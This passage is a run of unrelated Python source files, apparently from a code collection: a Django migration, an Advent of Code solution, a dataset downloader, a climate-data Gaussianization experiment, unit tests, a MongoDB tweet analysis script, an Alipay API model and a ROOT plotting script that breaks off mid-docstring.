        # which fails loudly instead of clicking the wrong element).
        _AGILE_TESTING: _AGILE_TESTING_SAVE_FOR_LATER_CSS_SELECTOR,
        _SELENIUM_WEBDRIVER: _SELENIUM_WEB_DRIVER_SAVE_FOR_LATER_CSS_SELECTOR
    },
    "delete_from_cart": {
        _TEST_AUTOMATION: _TEST_AUTOMATION_DELETE_LINK_CSS_SELECTOR,
        _AGILE_TESTING: _AGILE_TESTING_DELETE_LINK_CSS_SELECTOR,
        _SELENIUM_WEBDRIVER: _SELENIUM_WEB_DRIVER_DELETE_LINK_CSS_SELECTOR
    }
}
# Generated by Django 3.1 on 2020-08-23 04:56
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the ``Item`` model (a clothing item with
    a category, image, color, possession flag and optional shop info).

    NOTE(review): auto-generated by Django 3.1; once applied anywhere,
    prefer adding new migrations over editing this one.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Item',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255, verbose_name='名前')),
                ('category', models.PositiveIntegerField(choices=[(1, 'tops'), (2, 'bottoms')], verbose_name='カテゴリ')),
                ('image', models.FileField(upload_to='', verbose_name='画像')),
                ('color', models.PositiveIntegerField(choices=[(1, 'black'), (2, 'white'), (3, 'blue'), (4, 'yellow'), (5, 'else')], verbose_name='色')),
                # NOTE(review): 'posession' is a typo for 'possession';
                # renaming the field requires a follow-up migration.
                ('posession', models.BooleanField(verbose_name='所有')),
                ('shopname', models.CharField(max_length=255, null=True, verbose_name='店名')),
                ('shopurl', models.CharField(max_length=1028, null=True, verbose_name='URL')),
            ],
        ),
    ]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
@Author : Ven
@Date : 2020/12/10
"""
# Read adapter joltages, then add the wall outlet (0) and the built-in
# device adapter (max + 3), as the puzzle requires.
INPUT = []
with open("2020-10.data") as f:
    for i in f.read().split("\n"):
        INPUT.append(int(i))
INPUT.append(0)
INPUT.append(max(INPUT) + 3)
INPUT.sort()
print(INPUT)
# Encode consecutive gaps as a digit string (only "1"s and "3"s for valid
# puzzle input), then split on "3": each piece is a run of 1-jolt gaps
# whose arrangement counts multiply independently.
VAR_1 = ""
for i in range(0, len(INPUT) - 1):
    VAR_1 += str(INPUT[i + 1] - INPUT[i])
VAR_2 = VAR_1.split("3")
print(VAR_2)
def check(cha):
    """Return the number of adapter arrangements for a run of 1-jolt gaps.

    Args:
        cha: the run, given as a string whose length is the run length
            (only the length is used).
    Returns:
        The arrangement count. Follows the tribonacci recurrence
        a(n) = a(n-1) + a(n-2) + a(n-3) with a(0)=1, a(1)=1, a(2)=2.

    Generalized from the original hard-coded table: lengths 0-4 still map
    to 1, 1, 2, 4, 7, and longer runs are now computed instead of raising.
    """
    length = len(cha)
    # iterate the recurrence; (a, b, c) hold a(n-3), a(n-2), a(n-1)
    a, b, c = 0, 0, 1
    for _ in range(length):
        a, b, c = b, c, a + b + c
    return c
# Multiply the arrangement counts of the independent runs to get the
# total number of adapter arrangements (AoC 2020 day 10, part 2).
answer = 1
for one in VAR_2:
    answer *= check(one)
print(answer)
|
import os
import errno
from torchvision.datasets.utils import download_url, extract_archive
class DataSetDownloader:
    """Downloads a named data set archive and extracts it under root_dir."""

    def __init__(self, root_dir, dataset_title, download=False):
        """
        Parameters:
            root_dir: root directory of data set
            dataset_title: title of dataset for download
            download: flag, True - data set should be downloaded, else the value is False
        Raises:
            RuntimeError: if the data set directory is missing and
                download was not requested.
        """
        self.root_dir = root_dir
        self.dataset_title = dataset_title
        self.download = download
        self.full_root_dir = os.path.join(self.root_dir, self.dataset_title)
        if download:
            self.download_dataset()
        if not os.path.exists(self.full_root_dir):
            raise RuntimeError('Data set was not found, please, use download=True to download it')

    def download_dataset(self):
        """ Download dataset if it does not exist in the specified directory """
        # A directory with at least two entries is treated as already
        # downloaded (the extracted tree plus, possibly, the archive).
        # os.listdir replaces the previous len([... for ... in os.scandir])
        # construct (pylint R1721), which also left the scandir iterator open.
        if os.path.exists(self.full_root_dir) and len(os.listdir(self.full_root_dir)) >= 2:
            print("The data set has been already downloaded")
            return
        # create root dir; exist_ok replaces the manual errno.EEXIST check
        os.makedirs(self.full_root_dir, exist_ok=True)
        dataset_url = self._dataset_mapper()
        # the archive name is the last path component of the URL
        archive_name = dataset_url.rpartition('/')[2]
        self._get_dataset(dataset_url, filename=archive_name)

    def _dataset_mapper(self):
        """ Verifies data set title and returns url of data set
        Raises:
            KeyError: if the title is not one of the supported data sets.
        """
        dataset_map = {
            'tiny-imagenet-200': 'http://cs231n.stanford.edu/tiny-imagenet-200.zip',
            'PennFudanPed': 'https://www.cis.upenn.edu/~jshi/ped_html/PennFudanPed.zip'
        }
        if self.dataset_title in dataset_map:
            return dataset_map[self.dataset_title]
        raise KeyError(
            '{} data set was not found. Check its title or choose another one from the list: {}'.format(
                self.dataset_title, list(dataset_map.keys())
            )
        )

    def _get_dataset(self, url, filename=None, remove_finished=True):
        """Download *url* into full_root_dir and extract it into root_dir.

        Parameters:
            url: archive URL to fetch
            filename: archive file name; defaults to the URL's basename
            remove_finished: delete the archive after extraction
        """
        self.full_root_dir = os.path.expanduser(self.full_root_dir)
        if not filename:
            filename = os.path.basename(url)
        print('Downloading {}...'.format(self.dataset_title))
        download_url(url, self.full_root_dir, filename)
        archive = os.path.join(self.full_root_dir, filename)
        print("Extracting {} to {}".format(archive, self.root_dir))
        extract_archive(archive, self.root_dir, remove_finished)
        print("Done!")
|
import sys, os
from pyprojroot import here
# Locate the project root via the ".here" marker file and make project
# packages importable when this script is run directly.
root = here(project_files=[".here"])
sys.path.append(str(here()))
from typing import Dict, Optional, Union, Any
from collections import namedtuple
import pathlib
import argparse
import pandas as pd
from tqdm import tqdm
import numpy as np
import time
import joblib
import xarray as xr
import logging
# Experiment Functions
from src.data.esdc import get_dataset
from src.features.temporal import select_period, TimePeriod, remove_climatology
from src.features.spatial import (
get_spain,
select_region,
get_europe,
get_northern_hemisphere,
get_southern_hemisphere,
)
from sklearn.preprocessing import StandardScaler
from src.models.density import get_rbig_model
from src.models.utils import parallel_predictions
from src.features.utils import subset_indices
from src.features.density import get_density_cubes, get_information_cubes
from src.features.preprocessing import (
standardizer_data,
get_reference_cube,
get_common_indices,
)
from sklearn.utils import check_random_state
# Log INFO and above to stdout.
# NOTE(review): the f-prefix on the format string is unnecessary (no
# placeholders) but harmless.
logging.basicConfig(
    level=logging.INFO,
    stream=sys.stdout,
    format=f"%(asctime)s: %(levelname)s: %(message)s",
)
logger = logging.getLogger()
# logger.setLevel(logging.INFO)

# Named triple describing a spatio-temporal configuration.
SPATEMP = namedtuple("SPATEMP", ["spatial", "temporal", "dimensions"])
# Fixed RNG for reproducible noise/subsampling.
RNG = check_random_state(123)
# Output directory for probability cubes, relative to the project root.
RES_PATH = pathlib.Path(str(root)).joinpath("data/spa_temp/info_earth/world")
def get_parameters(args) -> Dict:
    """Translate CLI arguments into experiment parameters.

    Args:
        args: namespace with ``variable``, ``region`` and ``period``.
    Returns:
        Dict with keys "variable" (list of cube variable names),
        "region" (bounding box or the ["world"] sentinel) and
        "period" (TimePeriod).
    Raises:
        ValueError: if variable, region, or period is not recognized.
    """
    parameters = {}
    # ======================
    # Variable
    # ======================
    if args.variable == "gpp":
        parameters["variable"] = ["gross_primary_productivity"]
    elif args.variable == "sm":
        parameters["variable"] = ["soil_moisture"]
    elif args.variable == "lst":
        parameters["variable"] = ["land_surface_temperature"]
    elif args.variable == "lai":
        parameters["variable"] = ["leaf_area_index"]
    elif args.variable == "rm":
        parameters["variable"] = ["root_moisture"]
    elif args.variable == "precip":
        parameters["variable"] = ["precipitation"]
    else:
        raise ValueError("Unrecognized variable")
    # ======================
    # Region
    # ======================
    if args.region == "spain":
        parameters["region"] = get_spain()
    elif args.region == "europe":
        parameters["region"] = get_europe()
    elif args.region == "world":
        # sentinel: a plain list, handled specially downstream
        parameters["region"] = ["world"]
    elif args.region == "north":
        parameters["region"] = get_northern_hemisphere()
    elif args.region == "south":
        parameters["region"] = get_southern_hemisphere()
    else:
        raise ValueError("Unrecognized region")
    # ======================
    # Period
    # ======================
    if args.period == "2010":
        parameters["period"] = TimePeriod(name="2010", start="Jan-2010", end="Dec-2010")
    elif args.period == "2002_2010":
        parameters["period"] = TimePeriod(
            name="2002_2010", start="Jan-2002", end="Dec-2010"
        )
    else:
        # BUG FIX: previously an unknown period fell through silently,
        # returning a dict with no "period" key and causing a KeyError
        # later in the pipeline.
        raise ValueError("Unrecognized period")
    return parameters
def experiment_step(args: argparse.Namespace,) -> Union[Any, Any]:
    """Run one Gaussianization experiment step.

    Loads the requested variable, subsets it in space and time, builds
    density cubes, standardizes them, fits an RBIG model, and estimates
    per-sample probabilities.

    Args:
        args: parsed CLI arguments (see the argparse setup in __main__).
    Returns:
        Probability/information cubes with the experiment parameters
        attached as ``attrs``.
    """
    logging.info(f"Extracting Parameters")
    parameters = get_parameters(args)
    # ======================
    # experiment - Data
    # ======================
    # Get DataCube
    logging.info(f"Loading '{parameters['variable'][0]}' variable")
    datacube = get_dataset(parameters["variable"])
    # ======================
    # RESAMPLE
    # ======================
    if args.resample:
        # coarsen to monthly means before any subsetting
        logging.info(f"Resampling datacube...")
        datacube = datacube.resample(time="1MS").mean()
    # ======================
    # SPATIAL SUBSET
    # ======================
    try:
        logging.info(f"Selecting region '{parameters['region'].name}'")
        datacube = select_region(xr_data=datacube, bbox=parameters["region"])[
            parameters["variable"]
        ]
    # BUG FIX: was a bare `except:`, which also swallows SystemExit and
    # KeyboardInterrupt. The expected failure mode is the "world" sentinel
    # (a plain list with no `.name` attribute), so catch Exception at most
    # and keep the whole-world cube.
    except Exception:
        logging.info(f"Selecting region 'world'")
    # ======================
    # CLIMATOLOGY (TEMPORAL)
    # ======================
    if args.clima:
        logging.info("Removing climatology...")
        datacube, _ = remove_climatology(datacube)
    # ======================
    # TEMPORAL SUBSET
    # ======================
    logging.info(f"Selecting temporal period: '{parameters['period'].name}'")
    datacube = select_period(xr_data=datacube, period=parameters["period"])
    # ======================
    # DENSITY CUBES
    # ======================
    logging.info(f"Getting density cubes: S: {args.spatial}, T: {args.temporal}")
    if isinstance(datacube, xr.Dataset):
        # density cubes need a DataArray, not a Dataset
        datacube = datacube[parameters["variable"][0]]
    density_cube_df = get_density_cubes(
        data=datacube, spatial=args.spatial, temporal=args.temporal,
    )
    logging.info(f"Total data: {density_cube_df.shape}")
    # ======================
    # STANDARDIZE DATA
    # ======================
    logging.info(f"Standardizing data...")
    x_transformer = StandardScaler().fit(density_cube_df.values)
    density_cube_df_norm = pd.DataFrame(
        data=x_transformer.transform(density_cube_df.values),
        columns=density_cube_df.columns.values,
        index=density_cube_df.index,
    )
    # ======================
    # SUBSAMPLE DATA
    # ======================
    if args.smoke_test:
        # tiny fixed subsample for a quick end-to-end run
        logging.info(f"Smoke Test...")
        logging.info(f"Subsampling datacube...")
        idx = subset_indices(
            density_cube_df_norm.values, subsample=1000, random_state=100
        )
        X = density_cube_df_norm.iloc[idx, :].values
        index = density_cube_df_norm.iloc[idx, :].index
    elif args.subsample is not None:
        # fit on a subsample but keep the full index: probabilities are
        # later predicted for the whole (normalized) cube
        logging.info(f"Subsampling datacube...")
        idx = subset_indices(
            density_cube_df_norm.values, subsample=args.subsample, random_state=100
        )
        X = density_cube_df_norm.iloc[idx, :].values
        index = density_cube_df_norm.index
    else:
        X = density_cube_df_norm.values
        index = density_cube_df_norm.index
    logging.info(f"Input shape: {X.shape}")
    parameters["input_shape"] = X.shape
    # =========================
    # Model - Gaussianization
    # =========================
    # Gaussianize the data
    logging.info(f"Gaussianizing data...")
    t0 = time.time()
    rbig_model = get_rbig_model(X=X, method=args.method)
    rbig_model.fit(X)
    t1 = time.time() - t0
    logging.info(f"Time Taken: {t1:.2f} secs")
    parameters["rbig_fit_time"] = t1
    # =========================
    # PROB ESTIMATES
    # =========================
    logging.info(f"Getting probability estimates...")
    t0 = time.time()
    # add noise
    if args.add_noise:
        # jitter breaks ties/degeneracies in the probability estimates
        # NOTE(review): writing through `.values` relies on pandas
        # returning a mutable view here -- confirm on the pinned pandas
        # version.
        logging.info(f"Adding noise to values for probability...")
        density_cube_df_norm.values += 1e-1 * RNG.rand(
            *density_cube_df_norm.values.shape
        )
    logging.info(f"Parallel predictions...")
    if args.smoke_test:
        X_prob = parallel_predictions(
            X=X, func=rbig_model.predict_proba, batchsize=100, n_jobs=-1, verbose=1,
        )
    else:
        X_prob = parallel_predictions(
            X=density_cube_df_norm.values,
            func=rbig_model.predict_proba,
            batchsize=10_000,
            n_jobs=-1,
            verbose=1,
        )
    t1 = time.time() - t0
    logging.info(f"Time Taken: {t1:.2f} secs")
    parameters["prob_size"] = density_cube_df_norm.values.shape
    parameters["rbig_predict_time"] = t1
    X_prob = pd.DataFrame(data=X_prob, index=index, columns=["probability"])
    # returning density cubes
    logging.info(f"Getting information cubes.")
    X_prob = get_information_cubes(X_prob, time=args.temporal_mean)
    X_prob.attrs = parameters
    return X_prob
def main(args):
    """Build a save name from the CLI arguments, run the experiment step,
    and persist the resulting probability cubes under RES_PATH."""
    logging.info("Getting parameters...")
    logging.info("Getting save path...")
    # Encode the experiment configuration into the output file name.
    # NOTE(review): `args.spatial` appears twice and `args.temporal` once,
    # presumably encoding spatial x spatial x temporal cube dimensions --
    # confirm this is intended.
    save_name = (
        f"{args.save}_"
        f"{args.region}_"
        f"{args.variable}_"
        f"{args.period}_"
        f"s{args.subsample}_"
        f"d{args.spatial}{args.spatial}{args.temporal}"
    )
    if args.resample:
        save_name += f"_rs{args.resample}"
    X_prob = experiment_step(args=args)
    # ======================
    # SAVING
    # ======================
    # # Model + Transform
    # logging.info(f"Saving rbig model and transformer...")
    # model = {"rbig": rbig_model, "x_transform": x_transformer, "parameters": parameters}
    # joblib.dump(model, RES_PATH.joinpath(f"models/{save_name}.joblib"))
    # # Data
    # logging.info(f"Saving data...")
    # with open(RES_PATH.joinpath(f"cubes/{save_name}.csv"), "w") as f:
    #     density_cube_df.to_csv(f, header=True)
    # Probabilities
    logging.info(f"Saving estimated probabilities...")
    # with open(RES_PATH.joinpath(f"probs/{save_name}.h5"), "w") as f:
    X_prob.to_netcdf(RES_PATH.joinpath(f"prob_cubes/{save_name}.h5"), "w")
if __name__ == "__main__":
    # CLI entry point: parse the experiment configuration and run.
    # NOTE(review): --res, --njobs and --hemisphere are not consumed
    # anywhere in this file's visible code -- confirm they are still needed.
    parser = argparse.ArgumentParser(description="Arguments for GP experiment.")
    parser.add_argument(
        "--res", default="low", type=str, help="Resolution for datacube"
    )
    parser.add_argument(
        "-v", "--variable", default="gpp", type=str, help="Variable to use"
    )
    parser.add_argument(
        "-s", "--save", default="v0", type=str, help="Save name for experiment."
    )
    parser.add_argument(
        "--njobs", type=int, default=-1, help="number of processes in parallel",
    )
    parser.add_argument(
        "--subsample", type=int, default=200_000, help="subset points to take"
    )
    parser.add_argument(
        "--region", type=str, default="spain", help="Region to be Gaussianized"
    )
    parser.add_argument(
        "--temporal", type=int, default=1, help="Number of temporal dimensions",
    )
    parser.add_argument(
        "--spatial", type=int, default=1, help="Number of spatial dimensions"
    )
    parser.add_argument(
        "--period", type=str, default="2010", help="Period to do the Gaussianization"
    )
    parser.add_argument(
        "--hemisphere", type=str, default="top", help="Hemisphere for data"
    )
    parser.add_argument(
        "-rs", "--resample", type=str, default=None, help="Resample Frequency"
    )
    parser.add_argument("-m", "--method", type=str, default="old", help="RBIG Method")
    parser.add_argument("-sm", "--smoke-test", action="store_true")
    parser.add_argument("-tm", "--temporal-mean", action="store_true")
    parser.add_argument("-c", "--clima", action="store_true")
    parser.add_argument("-n", "--add-noise", action="store_true")
    main(parser.parse_args())
|
"""
Documents Model Unittests
Copyright (c) 2018 Qualcomm Technologies, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the
limitations in the disclaimer below) provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following
disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of Qualcomm Technologies, Inc. nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY
THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
from app.api.v1.models.documents import Documents
def test_get_label_by_id(session):
    """Verify that get_label_by_id() returns the right label for a given id."""
    documents = [
        Documents(id=111, label='shp doc', type=1, required=True),
        Documents(id=211, label='ath doc', type=1, required=True),
    ]
    session.bulk_save_objects(documents)
    session.commit()
    expected = {111: 'shp doc', 211: 'ath doc'}
    for doc_id, label in expected.items():
        assert Documents.get_label_by_id(doc_id) == label
    # an id that was never inserted yields None
    assert Documents.get_label_by_id(2334242323322) is None
def test_get_document_by_id(session):
    """Verify that get_document_by_id() returns a document for a known id."""
    documents = [
        Documents(id=1110, label='shp doc', type=1, required=True),
        Documents(id=2110, label='ath doc', type=1, required=True),
    ]
    session.bulk_save_objects(documents)
    session.commit()
    for doc_id in (1110, 2110):
        assert Documents.get_document_by_id(doc_id)
    # an unknown id yields None
    assert Documents.get_document_by_id(79897777879) is None
def test_get_document_by_name(session):
    """Verify that get_document_by_name() returns a document for a known
    (name, type) pair."""
    documents = [
        Documents(id=11101, label='shp doc', type=1, required=True),
        Documents(id=21102, label='ath doc', type=2, required=True),
    ]
    session.bulk_save_objects(documents)
    session.commit()
    for name, doc_type in (('shp doc', 1), ('ath doc', 2)):
        assert Documents.get_document_by_name(name, doc_type)
    # an unknown name yields None
    assert Documents.get_document_by_name('88668', 1) is None
def test_get_documents(session):
    """Verify that get_documents() returns all the documents of same type."""
    docs = [
        Documents(id=11101003, label='shp doc', type=1, required=True),
        Documents(id=21102004, label='ath doc', type=1, required=True),
        Documents(id=11101005, label='shp doc', type=2, required=True),
        Documents(id=21102006, label='ath doc', type=2, required=True)
    ]
    session.bulk_save_objects(docs)
    session.commit()
    docs_1 = Documents.get_documents('registration')
    assert docs_1
    for doc in docs_1:
        assert doc.type == 1
    docs_2 = Documents.get_documents('avddd')
    # BUG FIX: previously re-asserted docs_1 here, so an empty docs_2
    # (and its vacuous loop below) went undetected.
    assert docs_2
    for doc in docs_2:
        assert doc.type == 2
def test_required_docs(session):
    """Verify that the required_docs() only returns docs for which the required flag is true."""
    docs = [
        Documents(id=111010034, label='shp doc', type=1, required=True),
        Documents(id=211020045, label='ath doc', type=1, required=False),
        Documents(id=111010056, label='shp doc', type=2, required=True),
        Documents(id=211020067, label='ath doc', type=2, required=True)
    ]
    session.bulk_save_objects(docs)
    session.commit()
    docs = Documents.get_required_docs('registration')
    # guard against a vacuously-passing empty result
    assert docs
    for doc in docs:
        assert doc.required
    docs = Documents.get_required_docs('avdd')
    assert docs
    for doc in docs:
        assert doc.required
|
#!/usr/bin/env python3
import json
from statistics import stdev
from sys import argv
from datetime import datetime
from pymongo import MongoClient
def consume(source='apple--2018-09-03T13-11-54.json'):
    """Load tweets from *source* (a JSON file) into the hw2.hw2col collection.

    Args:
        source: path to a JSON file containing a tweet document or a list
            of tweet documents.
    """
    # open connection
    client = MongoClient('localhost', 27017)
    try:
        db = client.hw2
        # load + insert
        with open(source) as f:
            data = json.load(f)
        if data:
            # BUG FIX: Collection.insert() was deprecated and removed in
            # pymongo 4.x; dispatch to insert_many/insert_one instead.
            if isinstance(data, list):
                db.hw2col.insert_many(data)
            else:
                db.hw2col.insert_one(data)
    finally:
        # close connection even if loading/inserting fails
        client.close()
# Matches timestamps from 2013-08 through 2018-08 inclusive.
# BUG FIX: the original pattern used [08|09|10|11|12], which is a character
# CLASS matching one character from {0,1,8,9,2,|}, not the intended
# month alternation. Parentheses give true alternation.
_TIMESTAMP_REGEX = r'^(2013-(08|09|10|11|12)|201[4-7]|2018-0[1-8])'


def _summarize(db, retweet_filter, label):
    """Print count/mean/stdev of retweets for documents in the analysis
    window matching *retweet_filter*.

    Args:
        db: the hw2 database handle.
        retweet_filter: Mongo comparison document for the 'retweets' field.
            NOTE(review): retweets are stored as strings, so $gt/$gte
            compare lexicographically -- confirm this matches the data.
        label: human-readable description of the filter.
    """
    cursor = db.hw2col.find({
        'timestamp': {'$regex': _TIMESTAMP_REGEX},
        'retweets': retweet_filter,
    })
    retweets = [int(document['retweets']) for document in cursor]
    print('Duration: 2013-08-xx through 2018-08-xx')
    print(label)
    print('')
    print('')
    # guard against empty / single-element result sets (the original
    # crashed with ZeroDivisionError or a statistics error here)
    if retweets:
        print('total retweets: {:.2f}'.format(sum(retweets)))
        print('mean retweets: {:.2f}'.format(sum(retweets) / len(retweets)))
        if len(retweets) > 1:
            print('stdev retweets: {:.2f}'.format(stdev(retweets)))
    else:
        print('no matching documents')
    print('=============================================')


def analyze(outfile='report.json'):
    """Print retweet statistics for the apple tweet collection.

    Args:
        outfile: kept for interface compatibility.
            NOTE(review): currently unused -- no report file is written.
    """
    # open connection
    client = MongoClient('localhost', 27017)
    try:
        db = client.hw2
        print('=============================================')
        print('Retweets on apple')
        print('=============================================')
        _summarize(db, {'$gte': '0'}, 'Retweets >= 0')
        print('')
        _summarize(db, {'$eq': '1'}, 'Retweets = 1')
        _summarize(db, {'$gt': '1'}, 'Retweets > 1')
    finally:
        # close connection even on query failure
        client.close()
if __name__ == '__main__':
    # BUG FIX: the original indexed argv[1] unconditionally, raising
    # IndexError when the script was run with no arguments.
    if len(argv) > 1 and argv[1] == 'consume':
        consume(*argv[2:])
    elif len(argv) > 1 and argv[1] == 'analyze':
        analyze(*argv[2:])
    else:
        print('usage: {} consume|analyze [args...]'.format(argv[0]))
|
from rank.util import purge
def main(_in, _out):
    """Read a movie title from *_in* and write its purged comments,
    one per line prefixed with '| ', to *_out*."""
    # imported lazily, matching the original's deferred module load
    from rank.collect.movie import get_comments

    title = _in.read().strip()
    for comment in get_comments(title):
        _out.write("| {0}\n".format(purge(comment)))
if __name__ == "__main__":
    import sys

    # Pipe stdin (a movie title) to stdout (purged comments).
    main(sys.stdin, sys.stdout)
|
# BUG FIX: "rom" -> "from"; the truncated keyword made this module a
# SyntaxError and unimportable.
from django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string


def send_welcome_email(name, receiver):
    """Send a welcome email to *receiver*, addressed to *name*.

    NOTE(review): still a stub -- the email body/template and the actual
    send are not implemented yet.
    """
    pass
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayFundTransIcrowdTagModifyModel(object):
    """Request model for the alipay.fund.trans.icrowd.tag.modify API.

    Carries the mobile number, scene code, tag code/value and user id,
    and converts to/from the plain-dict form used by the gateway.
    """

    def __init__(self):
        self._mobile = None
        self._scene_code = None
        self._tag_code = None
        self._tag_value = None
        self._user_id = None

    @property
    def mobile(self):
        return self._mobile

    @mobile.setter
    def mobile(self, value):
        self._mobile = value

    @property
    def scene_code(self):
        return self._scene_code

    @scene_code.setter
    def scene_code(self, value):
        self._scene_code = value

    @property
    def tag_code(self):
        return self._tag_code

    @tag_code.setter
    def tag_code(self, value):
        self._tag_code = value

    @property
    def tag_value(self):
        return self._tag_value

    @tag_value.setter
    def tag_value(self, value):
        self._tag_value = value

    @property
    def user_id(self):
        return self._user_id

    @user_id.setter
    def user_id(self, value):
        self._user_id = value

    def to_alipay_dict(self):
        """Serialize the populated (truthy) fields into a plain dict."""
        params = dict()
        for name in ('mobile', 'scene_code', 'tag_code', 'tag_value', 'user_id'):
            value = getattr(self, name)
            if not value:
                continue
            # nested API objects serialize themselves
            if hasattr(value, 'to_alipay_dict'):
                value = value.to_alipay_dict()
            params[name] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a model instance from a dict; empty input yields None."""
        if not d:
            return None
        o = AlipayFundTransIcrowdTagModifyModel()
        for name in ('mobile', 'scene_code', 'tag_code', 'tag_value', 'user_id'):
            if name in d:
                setattr(o, name, d[name])
        return o
|
import pandas as pd
import os
from sklearn.model_selection import train_test_split
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def train_val_split(trainx_path, trainy_path, trainpx_path,
                    trainpy_path,valx_path, valy_path):
    """Split a seq2seq training corpus into train/validation files.

    Reads the X and y CSVs, holds out 0.2% of rows as validation with a
    fixed seed (reproducible split), and writes all four parts as
    tab-separated files without header or index column.
    """
    trainx = pd.read_csv(trainx_path, encoding="utf_8")
    trainy = pd.read_csv(trainy_path, encoding="utf_8")
    print("The length of trainX is %i" % len(trainx))
    print("The length of trainy is %i" % len(trainy))
    # Split into training and validation sets (was: 训练集与验证集划分)
    Xtrain, Xval, ytrain, yval = train_test_split(trainx, trainy, test_size=0.002,
                                                  random_state=7)
    # Persist the four splits (was: 保存)
    Xtrain.to_csv(trainpx_path, sep="\t", index=None, header=False)
    ytrain.to_csv(trainpy_path, sep="\t", index=None, header=False)
    Xval.to_csv(valx_path, sep="\t", index=None, header=False)
    yval.to_csv(valy_path, sep="\t", index=None, header=False)
if __name__ == "__main__":
    # Paths are resolved relative to the repository root (parent of this
    # file's directory); the segmented train_set files must already exist.
    train_val_split("{}/Dataset/train_set.seg_x.txt".format(BASE_DIR),
                    "{}/Dataset/train_set.seg_y.txt".format(BASE_DIR),
                    "{}/Dataset/train_split_x.txt".format(BASE_DIR),
                    "{}/Dataset/train_split_y.txt".format(BASE_DIR),
                    "{}/Dataset/val_x.txt".format(BASE_DIR),
                    "{}/Dataset/val_y.txt".format(BASE_DIR))
|
#!/usr/bin/env python
import re
import sys
import array
import ROOT
ROOT.gROOT.SetBatch(True)
ROOT.PyConfig.IgnoreCommandLineOptions = True
colors = [
ROOT.kBlue,
ROOT.kRed+1,
ROOT.kBlack
]
def findBounds(x, ys, xmin=None, ymin=None, xmax=None, ymax=None):
    """Return (xmin, ymin, xmax, ymax), deriving any unset bound from the data.

    The derived ymax gets 10% headroom so the tallest curve is not clipped
    against the frame edge.
    """
    xlo = min(x) if xmin is None else xmin
    xhi = max(x) if xmax is None else xmax
    ylo = min(min(ycol) for ycol in ys) if ymin is None else ymin
    yhi = max(max(ycol) for ycol in ys) * 1.1 if ymax is None else ymax
    return (xlo, ylo, xhi, yhi)
def makePlot(name, x, ys, ytitle,
             title=None,
             legends=None,
             ideal1=None,
             bounds={},
             legendYmax=0.99
             ):
    """Draw one TGraph per entry of *ys* against *x* and save <name>.png/.pdf.

    name       -- output file basename (extension appended on save)
    x          -- shared x values (thread counts)
    ys         -- list of y-value lists, one graph per entry
    ytitle     -- y-axis label
    title      -- optional frame title
    legends    -- optional legend labels, parallel to ys
    ideal1     -- if given, draw the ideal-scaling line through (1, ideal1)
    bounds     -- keyword overrides forwarded to findBounds
    legendYmax -- top NDC y coordinate of the legend box

    NOTE(review): `bounds={}` is a mutable default argument; harmless here
    since it is only read, but a None sentinel would be safer.
    """
    canv = ROOT.TCanvas()
    canv.cd()
    canv.SetTickx(1)
    canv.SetTicky(1)
    canv.SetGridy(1)
    # Axis ranges are data-driven unless the caller overrides them.
    bounds = findBounds(x, ys, **bounds)
    frame = canv.DrawFrame(*bounds)
    frame.GetXaxis().SetTitle("Number of threads")
    frame.GetYaxis().SetTitle(ytitle)
    if title is not None:
        frame.SetTitle(title)
    frame.Draw("")
    leg = None
    if legends is not None:
        leg = ROOT.TLegend(0.77,legendYmax-0.19,0.99,legendYmax)
    # Collected graph objects; presumably kept so the Python references stay
    # alive until SaveAs -- confirm against PyROOT ownership rules.
    graphs = []
    if ideal1 is not None:
        # Dotted line for perfect linear scaling, clipped at the frame top.
        ymax = bounds[3]
        ideal_y = [ideal1, ymax]
        ideal_x = [1, ymax/ideal1]
        gr = ROOT.TGraph(2, array.array("d", ideal_x), array.array("d", ideal_y))
        gr.SetLineColor(ROOT.kBlack)
        gr.SetLineStyle(3)
        gr.Draw("same")
        if leg:
            leg.AddEntry(gr, "Ideal scaling", "l")
        graphs.append(gr)
    for i, y in enumerate(ys):
        gr = ROOT.TGraph(len(x), array.array("d", x), array.array("d", y))
        color = colors[i]
        gr.SetLineColor(color)
        gr.SetMarkerColor(color)
        gr.SetMarkerStyle(ROOT.kFullCircle)
        gr.SetMarkerSize(1)
        gr.Draw("LP SAME")
        if leg:
            leg.AddEntry(gr, legends[i], "lp")
        graphs.append(gr)
    if leg:
        leg.Draw("same")
    canv.SaveAs(name+".png")
    canv.SaveAs(name+".pdf")
def main(argv):
    """Parse a throughput log and produce scaling/efficiency/speedup plots.

    argv[1:4] = input log file, output file basename, graph title.
